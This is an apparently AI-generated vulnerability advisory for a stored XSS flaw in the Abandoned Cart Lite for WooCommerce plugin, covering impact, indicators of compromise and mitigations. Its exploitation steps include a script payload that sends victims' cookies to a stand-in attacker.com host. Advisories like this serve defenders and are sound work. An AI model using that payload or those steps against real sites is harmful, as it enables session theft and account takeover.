CVE-2026-65557
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-65557 is a stored Cross-Site Scripting (XSS) vulnerability affecting the Abandoned Cart Lite for WooCommerce WordPress plugin in versions 6.8.0 and earlier, developed by Tyche Softwares. The vulnerability allows a shop manager (a high-privileged user) to inject malicious scripts that execute in the browsers of other users viewing affected pages. It was published on July 27, 2026, with a patch advisory issued the same day. The vulnerability carries a CVSS v3.1 base score of 5.9 (Medium), assigned by Patchstack (GitHub Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), indicating that user-controllable input is not properly sanitized or escaped before being rendered in web pages served to other users. The attack vector is network-based, requires high privileges (shop manager role), and necessitates user interaction (a victim must view the affected page), with a changed scope indicating the impact crosses security boundaries from the plugin to the broader browser context. The specific input field or parameter susceptible to injection has not been publicly detailed in available sources (GitHub Advisory, Feedly).

Impact

A malicious shop manager can inject persistent JavaScript payloads into the WooCommerce store that execute in the browsers of other authenticated users (e.g., administrators or customers) who view the affected pages. This can result in session token theft, unauthorized account actions, content modification, or redirection of users to malicious external sites. The confidentiality, integrity, and availability impacts are each rated Low, reflecting partial but meaningful exposure (GitHub Advisory).

Exploitation steps

  1. Gain Shop Manager Access: Obtain or compromise a WordPress account with the shop manager role on a site running Abandoned Cart Lite for WooCommerce <= 6.8.0.
  2. Identify Vulnerable Input: Navigate to the plugin's administrative interface within WooCommerce and locate input fields that are rendered without proper output escaping (e.g., fields related to abandoned cart settings or notifications).
  3. Inject XSS Payload: Enter a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable field and save the configuration.
  4. Trigger Victim Interaction: Wait for or socially engineer a higher-privileged user (e.g., a site administrator) to view the page where the injected content is rendered.
  5. Harvest Results: The victim's browser executes the injected script, potentially sending session cookies or other sensitive data to the attacker's server, enabling session hijacking or further account compromise (GitHub Advisory).

Indicators of compromise

  • Logs: WordPress admin audit logs showing unusual input submissions or configuration changes by a shop manager account, particularly in WooCommerce or abandoned cart plugin settings.
  • Network: Outbound HTTP requests from victim browsers to unexpected external domains shortly after viewing WooCommerce admin pages (potential data exfiltration via XSS).
  • File System: Unexpected modifications to plugin configuration stored in the WordPress database (wp_options table) containing script tags or encoded JavaScript.
  • Process/Behavior: Unusual session activity for administrator accounts following shop manager logins, such as privilege escalation actions or settings changes not initiated by the administrator.

Mitigation and workarounds

Site administrators should update the Abandoned Cart Lite for WooCommerce plugin to a version newer than 6.8.0, as a patch has been made available per the GitHub Advisory GHSA-wf3g-p4jm-gx88. As interim measures, restrict shop manager role assignments to only fully trusted users, implement Content Security Policy (CSP) headers to limit script execution contexts, and monitor administrator actions for suspicious activity. No specific workaround short of upgrading has been documented (GitHub Advisory).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-65562MEDIUM6.5
  • betterdocs
NoYesJul 27, 2026
CVE-2026-65563MEDIUM5.9
  • themeisle-companion
NoYesJul 27, 2026
CVE-2026-65557MEDIUM5.9
  • woocommerce-abandoned-cart
NoYesJul 27, 2026
CVE-2026-65567MEDIUM5.3
  • event-tickets
NoYesJul 27, 2026
CVE-2026-65568MEDIUM5
  • visualcomposer
NoYesJul 27, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management